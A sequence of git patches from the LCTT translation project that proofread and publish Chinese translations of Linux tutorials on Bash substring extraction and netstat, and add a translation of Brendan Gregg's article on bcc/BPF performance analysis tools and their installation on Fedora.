Brendan Gregg - +Brendan Gregg是Netflix的一名高级性能架构师,在那里他进行大规模的计算机性能设计,分析和调优。[关于更多] [44] - Brendan Gregg is a senior performance architect at Netflix, where he does large scale computer performance design, analysis, and tuning.[More about me][44] * [Learn how you can contribute][6] From 6ca219c4026615f80ec1265b398b20add386e836 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 11 Dec 2017 00:49:55 +0800 Subject: [PATCH 0479/1627] PRF&PUB:20171206 How to extract substring in Bash.md @lujun9972 https://linux.cn/article-9127-1.html --- ...171206 How to extract substring in Bash.md | 41 +++++++++++-------- 1 file changed, 24 insertions(+), 17 deletions(-) rename {translated/tech => published}/20171206 How to extract substring in Bash.md (73%) diff --git a/translated/tech/20171206 How to extract substring in Bash.md b/published/20171206 How to extract substring in Bash.md similarity index 73% rename from translated/tech/20171206 How to extract substring in Bash.md rename to published/20171206 How to extract substring in Bash.md index f1deaebab9..c4a030303e 100644 --- a/translated/tech/20171206 How to extract substring in Bash.md +++ b/published/20171206 How to extract substring in Bash.md @@ -1,6 +1,7 @@ 如何在 Bash 中抽取子字符串 ====== -子字符串不是别的,就是出现在其他字符串内的字符串。 比如 “3382” 就是 “this is a 3382 test” 的子字符串。 我们有多种方法可以从中把数字或指定部分字符串抽取出来。 + +所谓“子字符串”就是出现在其它字符串内的字符串。 比如 “3382” 就是 “this is a 3382 test” 的子字符串。 我们有多种方法可以从中把数字或指定部分字符串抽取出来。 [![How to Extract substring in Bash Shell on Linux or Unix](https://www.cyberciti.biz/media/new/faq/2017/12/How-to-Extract-substring-in-Bash-Shell-on-Linux-or-Unix.jpg)][2] @@ -8,15 +9,17 @@ ### 在 Bash 中抽取子字符串 -其语法为: -```shell -## syntax ## -${parameter:offset:length} -``` -子字符串扩展是 bash 的一项功能。它会扩展成 parameter 值中以 offset 为开始,长为 length 个字符的字符串。 假设, $u 定义如下: +其语法为: ```shell -## define var named u ## +## 格式 ## +${parameter:offset:length} +``` + +子字符串扩展是 bash 的一项功能。它会扩展成 `parameter` 值中以 `offset` 为开始,长为 `length` 个字符的字符串。 假设, `$u` 定义如下: + +```shell +## 定义变量 u ## u="this is a test" ``` @@ -34,6 +37,7 @@ test ``` 其中这些参数分别表示: + + 10 : 偏移位置 + 4 : 长度 @@ -41,9 +45,9 @@ test 根据 bash 的 man 页说明: -> The Internal Field Separator that is used for word splitting after expansion and to split lines into words with the read builtin command。The default value is。 +> [IFS (内部字段分隔符)][3]用于在扩展后进行单词分割,并用内建的 read 命令将行分割为词。默认值是。 -另一种 POSIX 就绪(POSIX ready) 的方案如下: +另一种 POSIX 就绪POSIX ready的方案如下: ```shell u="this is a test" @@ -54,7 +58,7 @@ echo "$3" echo "$4" ``` -输出为: +输出为: ```shell this @@ -63,7 +67,7 @@ a test ``` -下面是一段 bash 代码,用来从 Cloudflare cache 中去除带主页的 url +下面是一段 bash 代码,用来从 Cloudflare cache 中去除带主页的 url。 ```shell #!/bin/bash @@ -113,14 +117,15 @@ done echo ``` -它的使用方法为: +它的使用方法为: + ```shell ~/bin/cf.clear.cache https://www.cyberciti.biz/faq/bash-for-loop/ https://www.cyberciti.biz/tips/linux-security.html ``` ### 借助 cut 命令 -可以使用 cut 命令来将文件中每一行或者变量中的一部分删掉。它的语法为: +可以使用 `cut` 命令来将文件中每一行或者变量中的一部分删掉。它的语法为: ```shell u="this is a test" @@ -135,13 +140,14 @@ var="$(cut -d' ' -f 4 <<< $u)" echo "${var}" ``` -想了解更多请阅读 bash 的 man 页: +想了解更多请阅读 bash 的 man 页: + ```shell man bash man cut ``` -另请参见: [Bash String Comparison: Find Out IF a Variable Contains a Substring][1] +另请参见: [Bash String Comparison: Find Out IF a Variable Contains a Substring][1] -------------------------------------------------------------------------------- @@ -149,10 +155,11 @@ via: https://www.cyberciti.biz/faq/how-to-extract-substring-in-bash/ 作者:[Vivek Gite][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 [a]:https://www.cyberciti.biz [1]:https://www.cyberciti.biz/faq/bash-find-out-if-variable-contains-substring/ [2]:https://www.cyberciti.biz/media/new/faq/2017/12/How-to-Extract-substring-in-Bash-Shell-on-Linux-or-Unix.jpg +[3]:https://bash.cyberciti.biz/guide/$IFS From 51b590e868d57387098c8ba42bdeb24e10a8cbab Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 11 Dec 2017 01:02:00 +0800 Subject: [PATCH 0480/1627] PRF&PUB:20171205 NETSTAT Command Learn to use netstat with examples.md @lujun9972 https://linux.cn/article-9128-1.html --- ...mand Learn to use netstat with examples.md | 55 +++++++++---------- 1 file changed, 27 insertions(+), 28 deletions(-) rename {translated/tech => published}/20171205 NETSTAT Command Learn to use netstat with examples.md (56%) diff --git a/translated/tech/20171205 NETSTAT Command Learn to use netstat with examples.md b/published/20171205 NETSTAT Command Learn to use netstat with examples.md similarity index 56% rename from translated/tech/20171205 NETSTAT Command Learn to use netstat with examples.md rename to published/20171205 NETSTAT Command Learn to use netstat with examples.md index b2b7175749..fc5a64b840 100644 --- a/translated/tech/20171205 NETSTAT Command Learn to use netstat with examples.md +++ b/published/20171205 NETSTAT Command Learn to use netstat with examples.md @@ -1,26 +1,25 @@ -NETSTAT 命令: 通过案例学习使用 netstate +通过示例学习使用 netstat ====== -Netstat 是一个告诉我们系统中所有 tcp/udp/unix socket 连接状态的命令行工具。它会列出所有已经连接或者等待连接状态的连接。 该工具在识别某个应用监听哪个端口时特别有用,我们也能用它来判断某个应用是否正常的在监听某个端口。 -Netstat 命令还能显示其他各种各样的网络相关信息,例如路由表, 网卡统计信息, 虚假连接以及多播成员等。 +netstat 是一个告诉我们系统中所有 tcp/udp/unix socket 连接状态的命令行工具。它会列出所有已经连接或者等待连接状态的连接。 该工具在识别某个应用监听哪个端口时特别有用,我们也能用它来判断某个应用是否正常的在监听某个端口。 -本文中,我们会通过几个例子来学习 Netstat。 +netstat 命令还能显示其它各种各样的网络相关信息,例如路由表, 网卡统计信息, 虚假连接以及多播成员等。 -(推荐阅读: [Learn to use CURL command with examples][1] ) +本文中,我们会通过几个例子来学习 netstat。 -Netstat with examples -============================================================ +(推荐阅读: [通过示例学习使用 CURL 命令][1] ) -### 1- 检查所有的连接 +### 1 - 检查所有的连接 使用 `a` 选项可以列出系统中的所有连接, + ```shell $ netstat -a ``` -这会显示系统所有的 tcp,udp 以及 unix 连接。 +这会显示系统所有的 tcp、udp 以及 unix 连接。 -### 2- 检查所有的 tcp/udp/unix socket 连接 +### 2 - 检查所有的 tcp/udp/unix socket 连接 使用 `t` 选项只列出 tcp 连接, @@ -28,19 +27,19 @@ $ netstat -a $ netstat -at ``` -类似的,使用 `u` 选项只列出 udp 连接 to list out only the udp connections on our system, we can use ‘u’ option with netstat, +类似的,使用 `u` 选项只列出 udp 连接, ```shell $ netstat -au ``` -使用 `x` 选项只列出 Unix socket 连接,we can use ‘x’ options, +使用 `x` 选项只列出 Unix socket 连接, ```shell $ netstat -ax ``` -### 3- 同时列出进程 ID/进程名称 +### 3 - 同时列出进程 ID/进程名称 使用 `p` 选项可以在列出连接的同时也显示 PID 或者进程名称,而且它还能与其他选项连用, @@ -48,15 +47,15 @@ $ netstat -ax $ netstat -ap ``` -### 4- 列出端口号而不是服务名 +### 4 - 列出端口号而不是服务名 -使用 `n` 选项可以加快输出,它不会执行任何反向查询(译者注:这里原文说的是 "it will perform any reverse lookup",应该是写错了),而是直接输出数字。 由于无需查询,因此结果输出会快很多。 +使用 `n` 选项可以加快输出,它不会执行任何反向查询(LCTT 译注:这里原文有误),而是直接输出数字。 由于无需查询,因此结果输出会快很多。 ```shell $ netstat -an ``` -### 5- 只输出监听端口 +### 5 - 只输出监听端口 使用 `l` 选项只输出监听端口。它不能与 `a` 选项连用,因为 `a` 会输出所有端口, @@ -64,15 +63,15 @@ $ netstat -an $ netstat -l ``` -### 6- 输出网络状态 +### 6 - 输出网络状态 -使用 `s` 选项输出每个协议的统计信息,包括接收/发送的包数量 +使用 `s` 选项输出每个协议的统计信息,包括接收/发送的包数量, ```shell $ netstat -s ``` -### 7- 输出网卡状态 +### 7 - 输出网卡状态 使用 `I` 选项只显示网卡的统计信息, @@ -80,7 +79,7 @@ $ netstat -s $ netstat -i ``` -### 8- 显示多播组(multicast group)信息 +### 8 - 显示多播组multicast group信息 使用 `g` 选项输出 IPV4 以及 IPV6 的多播组信息, @@ -88,7 +87,7 @@ $ netstat -i $ netstat -g ``` -### 9- 显示网络路由信息 +### 9 - 显示网络路由信息 使用 `r` 输出网络路由信息, @@ -96,7 +95,7 @@ $ netstat -g $ netstat -r ``` -### 10- 持续输出 +### 10 - 持续输出 使用 `c` 选项持续输出结果 @@ -104,7 +103,7 @@ $ netstat -r $ netstat -c ``` -### 11- 过滤出某个端口 +### 11 - 过滤出某个端口 与 `grep` 连用来过滤出某个端口的连接, @@ -112,17 +111,17 @@ $ netstat -c $ netstat -anp | grep 3306 ``` -### 12- 统计连接个数 +### 12 - 统计连接个数 -通过与 wc 和 grep 命令连用,可以统计指定端口的连接数量 +通过与 `wc` 和 `grep` 命令连用,可以统计指定端口的连接数量 ```shell $ netstat -anp | grep 3306 | wc -l ``` -这回输出 mysql 服务端口(即 3306)的连接数。 +这会输出 mysql 服务端口(即 3306)的连接数。 -这就是我们间断的案例指南了,希望它带给你的信息量足够。 有任何疑问欢迎提出。 +这就是我们简短的案例指南了,希望它带给你的信息量足够。 有任何疑问欢迎提出。 -------------------------------------------------------------------------------- @@ -130,7 +129,7 @@ via: http://linuxtechlab.com/learn-use-netstat-with-examples/ 作者:[Shusain][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From bde3b57aac3307c4a79d8bda046e79dea4907509 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Mon, 11 Dec 2017 08:26:16 +0800 Subject: [PATCH 0481/1627] Create 20171121 7 tools for analyzing performance in Linux with bccBPF.md --- ...lyzing performance in Linux with bccBPF.md | 422 ++++++++++++++++++ 1 file changed, 422 insertions(+) create mode 100644 translated/tech/20171121 7 tools for analyzing performance in Linux with bccBPF.md diff --git a/translated/tech/20171121 7 tools for analyzing performance in Linux with bccBPF.md b/translated/tech/20171121 7 tools for analyzing performance in Linux with bccBPF.md new file mode 100644 index 0000000000..4e55ed979a --- /dev/null +++ b/translated/tech/20171121 7 tools for analyzing performance in Linux with bccBPF.md @@ -0,0 +1,422 @@ +translating by yongshouzhang + + +7个 Linux 下使用 bcc/BPF 的性能分析工具 +============================================================ + +###使用伯克利的包过滤(BPF)编译器集合(BCC)工具深度探查你的 linux 代码。 + + [![](https://opensource.com/sites/default/files/styles/byline_thumbnail/public/pictures/brendan_face2017_620d.jpg?itok=xZzBQNcY)][7] 21 Nov 2017 [Brendan Gregg][8] [Feed][9] + +43[up][10] + + [4 comments][11] +![7 superpowers for Fedora bcc/BPF performance analysis](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/penguins%20in%20space_0.jpg?itok=umpCTAul) + +图片来源 : + +opensource.com + +在 linux 中出现的一种新技术能够为系统管理员和开发者提供大量用于性能分析和故障排除的新工具和仪表盘。 它被称为增强的伯克利数据包过滤器(eBPF,或BPF),虽然这些改进并不由伯克利开发,它们不仅仅是处理数据包,更多的是过滤。我将讨论在 Fedora 和 Red Hat Linux 发行版中使用 BPF 的一种方法,并在 Fedora 26 上演示。 + +BPF 可以在内核中运行用户定义的沙盒程序,以立即添加新的自定义功能。这就像可按需给 Linux 系统添加超能力一般。 你可以使用它的例子包括如下: + +* 高级性能跟踪工具:文件系统操作、TCP事件、用户级事件等的编程低开销检测。 + +* 网络性能 : 尽早丢弃数据包以提高DDoS的恢复能力,或者在内核中重定向数据包以提高性能。 + +* 安全监控 : 24x7 小时全天候自定义检测和记录内核空间与用户空间内的可疑事件。 + +在可能的情况下,BPF 程序必须通过一个内核验证机制来保证它们的安全运行,这比写自定义的内核模块更安全。我在此假设大多数人并不编写自己的 BPF 程序,而是使用别人写好的。在 GitHub 上的 [BPF Compiler Collection (bcc)][12] 项目中,我已发布许多开源代码。bcc 提供不同的 BPF 开发前端支持,包括Python和Lua,并且是目前最活跃的 BPF 模具项目。 + +### 7 个有用的 bcc/BPF 新工具 + +为了了解BCC / BPF工具和他们的乐器,我创建了下面的图表并添加到项目中 +To understand the bcc/BPF tools and what they instrument, I created the following diagram and added it to the bcc project: + +### [bcc_跟踪工具.png][13] + +![Linux bcc/BPF 跟踪工具图](https://opensource.com/sites/default/files/u128651/bcc_tracing_tools.png) + +Brendan Gregg, [CC BY-SA 4.0][14] + +这些是命令行界面工具,你可以通过 SSH (安全外壳)使用它们。目前大多数分析,包括我的老板,是用 GUIs 和仪表盘进行的。SSH是最后的手段。但这些命令行工具仍然是预览BPF能力的好方法,即使你最终打算通过一个可用的 GUI 使用它。我已着手向一个开源 GUI 添加BPF功能,但那是另一篇文章的主题。现在我想分享你今天可以使用的 CLI 工具。 + +### 1\. execsnoop + +从哪儿开始? 如何查看新的进程。这些可以消耗系统资源,但很短暂,它们不会出现在 top(1)命令或其他工具中。 这些新进程可以使用[execsnoop] [15]进行检测(或使用行业术语,可以追踪)。 在追踪时,我将在另一个窗口中通过 SSH 登录: + +``` +# /usr/share/bcc/tools/execsnoop +PCOMM PID PPID RET ARGS +sshd 12234 727 0 /usr/sbin/sshd -D -R +unix_chkpwd 12236 12234 0 /usr/sbin/unix_chkpwd root nonull +unix_chkpwd 12237 12234 0 /usr/sbin/unix_chkpwd root chkexpiry +bash 12239 12238 0 /bin/bash +id 12241 12240 0 /usr/bin/id -un +hostname 12243 12242 0 /usr/bin/hostname +pkg-config 12245 12244 0 /usr/bin/pkg-config --variable=completionsdir bash-completion +grepconf.sh 12246 12239 0 /usr/libexec/grepconf.sh -c +grep 12247 12246 0 /usr/bin/grep -qsi ^COLOR.*none /etc/GREP_COLORS +tty 12249 12248 0 /usr/bin/tty -s +tput 12250 12248 0 /usr/bin/tput colors +dircolors 12252 12251 0 /usr/bin/dircolors --sh /etc/DIR_COLORS +grep 12253 12239 0 /usr/bin/grep -qi ^COLOR.*none /etc/DIR_COLORS +grepconf.sh 12254 12239 0 /usr/libexec/grepconf.sh -c +grep 12255 12254 0 /usr/bin/grep -qsi ^COLOR.*none /etc/GREP_COLORS +grepconf.sh 12256 12239 0 /usr/libexec/grepconf.sh -c +grep 12257 12256 0 /usr/bin/grep -qsi ^COLOR.*none /etc/GREP_COLORS +``` +哇。 那是什么? 什么是grepconf.sh? 什么是 /etc/GREP_COLORS? 而且 grep通过运行自身阅读它自己的配置文件? 这甚至是如何工作的? + +欢迎来到有趣的系统追踪世界。 你可以学到很多关于系统是如何工作的(或者一些情况下根本不工作),并且发现一些简单的优化。 execsnoop 通过跟踪 exec()系统调用来工作,exec() 通常用于在新进程中加载不同的程序代码。 + +### 2\. opensnoop + +从上面继续,所以,grepconf.sh可能是一个shell脚本,对吧? 我将运行file(1)来检查,并使用[opensnoop][16] bcc 工具来查看打开的文件: + +``` +# /usr/share/bcc/tools/opensnoop +PID COMM FD ERR PATH +12420 file 3 0 /etc/ld.so.cache +12420 file 3 0 /lib64/libmagic.so.1 +12420 file 3 0 /lib64/libz.so.1 +12420 file 3 0 /lib64/libc.so.6 +12420 file 3 0 /usr/lib/locale/locale-archive +12420 file -1 2 /etc/magic.mgc +12420 file 3 0 /etc/magic +12420 file 3 0 /usr/share/misc/magic.mgc +12420 file 3 0 /usr/lib64/gconv/gconv-modules.cache +12420 file 3 0 /usr/libexec/grepconf.sh +1 systemd 16 0 /proc/565/cgroup +1 systemd 16 0 /proc/536/cgroup +``` +像execsnoop和opensnoop这样的工具每个事件打印一行。上图显示 file(1)命令当前打开(或尝试打开)的文件:返回的文件描述符(“FD”列)对于 /etc/magic.mgc 是-1,而“ERR”列指示它是“文件未找到”。我不知道该文件,也不知道 file(1)正在读取的 /usr/share/misc/magic.mgc 文件。我不应该感到惊讶,但是 file(1)在识别文件类型时没有问题: + +``` +# file /usr/share/misc/magic.mgc /etc/magic +/usr/share/misc/magic.mgc: magic binary file for file(1) cmd (version 14) (little endian) +/etc/magic: magic text file for file(1) cmd, ASCII text +``` +opensnoop通过跟踪 open()系统调用来工作。为什么不使用 strace -feopen file 命令呢? 这将在这种情况下起作用。然而,opensnoop 的一些优点在于它能在系统范围内工作,并且跟踪所有进程的 open()系统调用。注意上例的输出中包括了从systemd打开的文件。Opensnoop 也应该有更低的开销:BPF 跟踪已经被优化,并且当前版本的 strace(1)仍然使用较老和较慢的 ptrace(2)接口。 + +### 3\. xfsslower + +bcc/BPF 不仅仅可以分析系统调用。[xfsslower][17] 工具跟踪具有大于1毫秒(参数)延迟的常见XFS文件系统操作。 + +``` +# /usr/share/bcc/tools/xfsslower 1 +Tracing XFS operations slower than 1 ms +TIME COMM PID T BYTES OFF_KB LAT(ms) FILENAME +14:17:34 systemd-journa 530 S 0 0 1.69 system.journal +14:17:35 auditd 651 S 0 0 2.43 audit.log +14:17:42 cksum 4167 R 52976 0 1.04 at +14:17:45 cksum 4168 R 53264 0 1.62 [ +14:17:45 cksum 4168 R 65536 0 1.01 certutil +14:17:45 cksum 4168 R 65536 0 1.01 dir +14:17:45 cksum 4168 R 65536 0 1.17 dirmngr-client +14:17:46 cksum 4168 R 65536 0 1.06 grub2-file +14:17:46 cksum 4168 R 65536 128 1.01 grub2-fstest +[...] +``` +在上图输出中,我捕获了多个延迟超过 1 毫秒 的 cksum(1)读数(字段“T”等于“R”)。这个工作是在 xfsslower 工具运行的时候,通过在 XFS 中动态地设置内核函数实现,当它结束的时候解除检测。其他文件系统也有这个 bcc 工具的版本:ext4slower,btrfsslower,zfsslower 和 nfsslower。 + +这是个有用的工具,也是 BPF 追踪的重要例子。对文件系统性能的传统分析主要集中在块 I/O 统计信息 - 通常你看到的是由 iostat(1)工具打印并由许多性能监视 GUI 绘制的图表。这些统计数据显示了磁盘如何执行,但不是真正的文件系统。通常比起磁盘你更关心文件系统的性能,因为应用程序是在文件系统中发起请求和等待。并且文件系统的性能可能与磁盘的性能大为不同!文件系统可以完全从内存缓存中读取数据,也可以通过预读算法和回写缓存填充缓存。xfsslower 显示了文件系统的性能 - 应用程序直接体验到什么。这对于免除整个存储子系统通常是有用的; 如果确实没有文件系统延迟,那么性能问题很可能在别处。 + +### 4\. biolatency + +虽然文件系统性能对于理解应用程序性能非常重要,但研究磁盘性能也是有好处的。当各种缓存技巧不能再隐藏其延迟时,磁盘的低性能终会影响应用程序。 磁盘性能也是容量规划研究的目标。 + +iostat(1)工具显示平均磁盘 I/O 延迟,但平均值可能会引起误解。 以直方图的形式研究 I/O 延迟的分布是有用的,这可以通过使用 [biolatency] 来实现[18]: + +``` +# /usr/share/bcc/tools/biolatency +Tracing block device I/O... Hit Ctrl-C to end. +^C + usecs : count distribution + 0 -> 1 : 0 | | + 2 -> 3 : 0 | | + 4 -> 7 : 0 | | + 8 -> 15 : 0 | | + 16 -> 31 : 0 | | + 32 -> 63 : 1 | | + 64 -> 127 : 63 |**** | + 128 -> 255 : 121 |********* | + 256 -> 511 : 483 |************************************ | + 512 -> 1023 : 532 |****************************************| + 1024 -> 2047 : 117 |******** | + 2048 -> 4095 : 8 | | +``` +这是另一个有用的工具和例子; 它使用一个名为maps的BPF特性,它可以用来实现高效的内核内摘要统计。从内核级别到用户级别的数据传输仅仅是“计数”列。 用户级程序生成其余的。 + +值得注意的是,其中许多工具支持CLI选项和参数,如其使用信息所示: + +``` +# /usr/share/bcc/tools/biolatency -h +usage: biolatency [-h] [-T] [-Q] [-m] [-D] [interval] [count] + +Summarize block device I/O latency as a histogram + +positional arguments: + interval output interval, in seconds + count number of outputs + +optional arguments: + -h, --help show this help message and exit + -T, --timestamp include timestamp on output + -Q, --queued include OS queued time in I/O time + -m, --milliseconds millisecond histogram + -D, --disks print a histogram per disk device + +examples: + ./biolatency # summarize block I/O latency as a histogram + ./biolatency 1 10 # print 1 second summaries, 10 times + ./biolatency -mT 1 # 1s summaries, milliseconds, and timestamps + ./biolatency -Q # include OS queued time in I/O time + ./biolatency -D # show each disk device separately +``` +它们的行为像其他Unix工具是通过设计,以协助采用。 + +### 5\. tcplife + +另一个有用的工具是[tcplife][19] ,该例显示TCP会话的生命周期和吞吐量统计 + +``` +# /usr/share/bcc/tools/tcplife +PID COMM LADDR LPORT RADDR RPORT TX_KB RX_KB MS +12759 sshd 192.168.56.101 22 192.168.56.1 60639 2 3 1863.82 +12783 sshd 192.168.56.101 22 192.168.56.1 60640 3 3 9174.53 +12844 wget 10.0.2.15 34250 54.204.39.132 443 11 1870 5712.26 +12851 curl 10.0.2.15 34252 54.204.39.132 443 0 74 505.90 +``` +在你说:“我不能只是刮 tcpdump(8)输出这个?”之前请注意,运行 tcpdump(8)或任何数据包嗅探器,在高数据包速率系统上花费的开销会很大,即使tcpdump(8)的用户级和内核级机制已经过多年优化(可能更差)。tcplife不会测试每个数据包; 它只会监视TCP会话状态的变化,从而影响会话的持续时间。它还使用已经跟踪吞吐量的内核计数器,以及处理和命令信息(“PID”和“COMM”列),这些对 tcpdump(8)等线上嗅探工具是做不到的。 + +### 6\. gethostlatency + +之前的每个例子都涉及到内核跟踪,所以我至少需要一个用户级跟踪的例子。 这是[gethostlatency] [20],其中gethostbyname(3)和相关的库调用名称解析: + +``` +# /usr/share/bcc/tools/gethostlatency +TIME PID COMM LATms HOST +06:43:33 12903 curl 188.98 opensource.com +06:43:36 12905 curl 8.45 opensource.com +06:43:40 12907 curl 6.55 opensource.com +06:43:44 12911 curl 9.67 opensource.com +06:45:02 12948 curl 19.66 opensource.cats +06:45:06 12950 curl 18.37 opensource.cats +06:45:07 12952 curl 13.64 opensource.cats +06:45:19 13139 curl 13.10 opensource.cats +``` +是的,它始终是DNS,所以有一个工具来监视系统范围内的DNS请求可以很方便(这只有在应用程序使用标准系统库时才有效)看看我如何跟踪多个查找“opensource.com”? 第一个是188.98毫秒,然后是更快,不到10毫秒,毫无疑问,缓存的作用。它还追踪多个查找“opensource.cats”,一个可悲的不存在的主机,但我们仍然可以检查第一个和后续查找的延迟。 (第二次查找后是否有一点负面缓存?) + +### 7\. trace + +好的,再举一个例子。 [trace] [21]工具由Sasha Goldshtein提供,并提供了一些基本的printf(1)功能和自定义探针。 例如: + +``` +# /usr/share/bcc/tools/trace 'pam:pam_start "%s: %s", arg1, arg2' +PID TID COMM FUNC - +13266 13266 sshd pam_start sshd: root +``` +在这里,我正在跟踪 libpam 及其 pam_start(3)函数并将其两个参数都打印为字符串。 Libpam 用于可插入的身份验证模块系统,输出显示 sshd 为“root”用户(我登录)调用了 pam_start()。 USAGE消息中有更多的例子(“trace -h”),而且所有这些工具在bcc版本库中都有手册页和示例文件。 例如trace_example.txt和trace.8。 + +### 通过包安装 bcc + +安装 bcc 最佳的方法是从 iovisor 仓储库中安装,按照 bcc [INSTALL.md][22]。[IO Visor] [23]是包含 bcc 的Linux基金会项目。4.x系列Linux内核中增加了这些工具使用的BPF增强功能,上至4.9 \。这意味着拥有4.8内核的 Fedora 25可以运行大部分这些工具。 Fedora 26及其4.11内核可以运行它们(至少目前)。 + +如果你使用的是Fedora 25(或者Fedora 26,而且这个帖子已经在很多个月前发布了 - 你好,来自遥远的过去!),那么这个包的方法应该是正常的。 如果您使用的是Fedora 26,那么请跳至“通过源代码安装”部分,该部分避免了已知的固定错误。 这个错误修复目前还没有进入Fedora 26软件包的依赖关系。 我使用的系统是: + +``` +# uname -a +Linux localhost.localdomain 4.11.8-300.fc26.x86_64 #1 SMP Thu Jun 29 20:09:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux +# cat /etc/fedora-release +Fedora release 26 (Twenty Six) +``` +以下是我所遵循的安装步骤,但请参阅INSTALL.md获取更新的版本: + +``` +# echo -e '[iovisor]\nbaseurl=https://repo.iovisor.org/yum/nightly/f25/$basearch\nenabled=1\ngpgcheck=0' | sudo tee /etc/yum.repos.d/iovisor.repo +# dnf install bcc-tools +[...] +Total download size: 37 M +Installed size: 143 M +Is this ok [y/N]: y +``` +安装完成后,您可以在/ usr / share中看到新的工具: + +``` +# ls /usr/share/bcc/tools/ +argdist dcsnoop killsnoop softirqs trace +bashreadline dcstat llcstat solisten ttysnoop +[...] +``` +试着运行其中一个: + +``` +# /usr/share/bcc/tools/opensnoop +chdir(/lib/modules/4.11.8-300.fc26.x86_64/build): No such file or directory +Traceback (most recent call last): + File "/usr/share/bcc/tools/opensnoop", line 126, in + b = BPF(text=bpf_text) + File "/usr/lib/python3.6/site-packages/bcc/__init__.py", line 284, in __init__ + raise Exception("Failed to compile BPF module %s" % src_file) +Exception: Failed to compile BPF module +``` +运行失败,提示/lib/modules/4.11.8-300.fc26.x86_64/build丢失。 如果你也这样做,那只是因为系统缺少内核头文件。 如果你看看这个文件指向什么(这是一个符号链接),然后使用“dnf whatprovides”来搜索它,它会告诉你接下来需要安装的包。 对于这个系统,它是: + +``` +# dnf install kernel-devel-4.11.8-300.fc26.x86_64 +[...] +Total download size: 20 M +Installed size: 63 M +Is this ok [y/N]: y +[...] +``` +现在 + +``` +# /usr/share/bcc/tools/opensnoop +PID COMM FD ERR PATH +11792 ls 3 0 /etc/ld.so.cache +11792 ls 3 0 /lib64/libselinux.so.1 +11792 ls 3 0 /lib64/libcap.so.2 +11792 ls 3 0 /lib64/libc.so.6 +[...] +``` +运行起来了。 这是从另一个窗口中的ls命令捕捉活动。 请参阅前面的部分以获取其他有用的命令 + +### 通过源码安装 + +如果您需要从源代码安装,您还可以在[INSTALL.md] [27]中找到文档和更新说明。 我在Fedora 26上做了如下的事情: + +``` +sudo dnf install -y bison cmake ethtool flex git iperf libstdc++-static \ + python-netaddr python-pip gcc gcc-c++ make zlib-devel \ + elfutils-libelf-devel +sudo dnf install -y luajit luajit-devel # for Lua support +sudo dnf install -y \ + http://pkgs.repoforge.org/netperf/netperf-2.6.0-1.el6.rf.x86_64.rpm +sudo pip install pyroute2 +sudo dnf install -y clang clang-devel llvm llvm-devel llvm-static ncurses-devel +``` +除 netperf 外一切妥当,其中有以下错误: + +``` +Curl error (28): Timeout was reached for http://pkgs.repoforge.org/netperf/netperf-2.6.0-1.el6.rf.x86_64.rpm [Connection timed out after 120002 milliseconds] +``` + +不必理会,netperf是可选的 - 它只是用于测试 - 而 bcc 没有它也会编译成功。 + +以下是 bcc 编译和安装余下的步骤: + + +``` +git clone https://github.com/iovisor/bcc.git +mkdir bcc/build; cd bcc/build +cmake .. -DCMAKE_INSTALL_PREFIX=/usr +make +sudo make install +``` +在这一点上,命令应该起作用: + +``` +# /usr/share/bcc/tools/opensnoop +PID COMM FD ERR PATH +4131 date 3 0 /etc/ld.so.cache +4131 date 3 0 /lib64/libc.so.6 +4131 date 3 0 /usr/lib/locale/locale-archive +4131 date 3 0 /etc/localtime +[...] +``` + +More Linux resources + +* [What is Linux?][1] + +* [What are Linux containers?][2] + +* [Download Now: Linux commands cheat sheet][3] + +* [Advanced Linux commands cheat sheet][4] + +* [Our latest Linux articles][5] + +### 写在最后和其他前端 + +这是一个可以在 Fedora 和 Red Hat 系列操作系统上使用的新 BPF 性能分析强大功能的快速浏览。我演示了BPF的流行前端 [bcc][28] ,并包含了其在 Fedora 上的安装说明。bcc 附带了60多个用于性能分析的新工具,这将帮助您充分利用Linux系统。也许你会直接通过SSH使用这些工具,或者一旦它们支持BPF,你也可以通过监视GUI来使用相同的功能。 + +此外,bcc并不是开发中唯一的前端。[ply][29]和[bpftrace][30],旨在为快速编写自定义工具提供更高级的语言。此外,[SystemTap] [31]刚刚发布[版本3.2] [32],包括一个早期的实验性eBPF后端。 如果这一点继续得到发展,它将为运行多年来开发的许多SystemTap脚本和攻击集(库)提供一个生产安全和高效的引擎。 (使用SystemTap和eBPF将成为另一篇文章的主题。) + +如果您需要开发自定义工具,那么也可以使用 bcc 来实现,尽管语言比 SystemTap,ply 或 bpftrace 要冗长得多。 我的 bcc 工具可以作为代码示例,另外我还贡献了[教程] [33]来开发 Python 中的 bcc 工具。 我建议先学习bcc多工具,因为在需要编写新工具之前,你可能会从里面获得很多里程。 您可以从他们 bcc 存储库[funccount] [34],[funclatency] [35],[funcslower] [36],[stackcount] [37],[trace] [38] ,[argdist] [39] 的示例文件中研究 bcc。 + +感谢[Opensource.com] [40]进行编辑。 + +###  专题 + + [Linux][41][系统管理员][42] + +### About the author + + [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/brendan_face2017_620d.jpg?itok=LIwTJjL9)][43] Brendan Gregg + +- +Brendan Gregg是Netflix的一名高级性能架构师,在那里他进行大规模的计算机性能设计,分析和调优。[关于更多] [44] + + +* [Learn how you can contribute][6] + +-------------------------------------------------------------------------------- + +via:https://opensource.com/article/17/11/bccbpf-performance + +作者:[Brendan Gregg ][a] +译者:[yongshouzhang](https://github.com/yongshouzhang) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]: +[1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent 